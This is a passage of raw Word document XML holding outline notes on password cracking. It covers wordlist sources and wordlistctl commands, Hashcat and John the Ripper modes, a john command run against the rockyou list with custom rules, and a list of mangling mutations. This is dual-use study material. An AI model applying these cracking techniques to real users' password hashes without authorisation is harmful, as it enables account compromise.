      <w:r w:rsidRPr="0084205E">
        <w:t>Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F01D8" w14:textId="26CBB429" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SecLists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FCB4CC7" w14:textId="62E1BC26" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49454A26" w14:textId="522CA85C" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> search -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63030EF3" w14:textId="1643B887" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>search into local archives instead of remote ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0AC41F" w14:textId="77E8176A" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> fetch -l &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD72789" w14:textId="4FB68E70" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">decompress download with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> fetch -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2983474A" w14:textId="7F4D8F69" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> search &lt;term&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D839C50" w14:textId="43D0435B" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>facebook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27B4D686" w14:textId="27CBC61A" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>specific subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B9A54" w14:textId="68DFB20B" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> list -g &lt;category&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BE31ED" w14:textId="62A7E8D8" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlistctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> list -g fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C472B" w14:textId="72EF7C29" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>specific category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68FDEF" w14:textId="4BBED752" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Rawsec’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CyberSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73575375" w14:textId="35CEF936" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking Category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B6D6C" w14:textId="62591898" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cracking Tools, Modes, and Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1161FA" w14:textId="2C1F182C" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FEF087B" w14:textId="72B2F9C1" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>JtR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="572453FA" w14:textId="4ABCD15C" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>wordlist mode</w:t>
      </w:r>
      <w:r w:rsidR="00377DA1" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – all words contained in a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1BDF44" w14:textId="52F51A46" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>incremental mode</w:t>
      </w:r>
      <w:r w:rsidR="00377DA1" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – all possible character combinations as passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E554116" w14:textId="6A4ABC9C" w:rsidR="009107AD" w:rsidRPr="0084205E" w:rsidRDefault="009107AD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rule mode</w:t>
      </w:r>
      <w:r w:rsidR="00377DA1" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – using wordlist mode and adding pattern or mangle to string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032A1B6" w14:textId="001A0E96" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two common ways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE4DB6" w14:textId="1C40C62D" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>generating custom wordlist and using classic wordlist mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF62E4" w14:textId="38EF33B1" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>using common wordlist and tell cracking tool to apply custom mangling rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9ECFE9" w14:textId="6A615FE5" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Create own in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>JtR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34A8BDD7" w14:textId="2BDE32B5" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>$ john hash.txt --wordlist=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/passwords/rockyou.txt rules=&lt;rule file name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C1A75" w14:textId="0FC15572" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="00377DA1" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.openwall.com/john/doc/RULES.shtml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="610D8267" w14:textId="1B4699C8" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Border mutation - commonly used combinations of digits and special symbols can be added at the end, beginning, or both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E509769" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Freak mutation - letters are replaced with similarly looking special symbols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD89DC" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Case mutation - the program checks all variations of uppercase/lowercase letters for any character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2E9A48" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Order mutation - character order is reversed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E1A26F" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Repetition mutation - the same group of characters are repeated several times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352153EB" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vowels</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> mutation - vowels are omitted or capitalized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D1ECF" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Strip mutation - one or several characters are removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B3CD21" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Swap mutation - some characters are swapped and change places</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D15457" w14:textId="77777777" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Duplicate mutation - some characters are duplicated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649665E1" w14:textId="7E865369" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    Delimiter mutation - delimiters are added between characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023AE779" w14:textId="31D697EB" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Locate .conf file for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>JtR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="108ED3DD" w14:textId="7A8FEFC2" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">locate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>john.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EEDEDD8" w14:textId="58719279" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">create </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>john-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in same directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D1994" w14:textId="495D7A23" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create rules there</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22237FC3" w14:textId="2C4EA866" w:rsidR="00377DA1" w:rsidRPr="0084205E" w:rsidRDefault="00377DA1" w:rsidP="0084205E">
      <w:pPr>
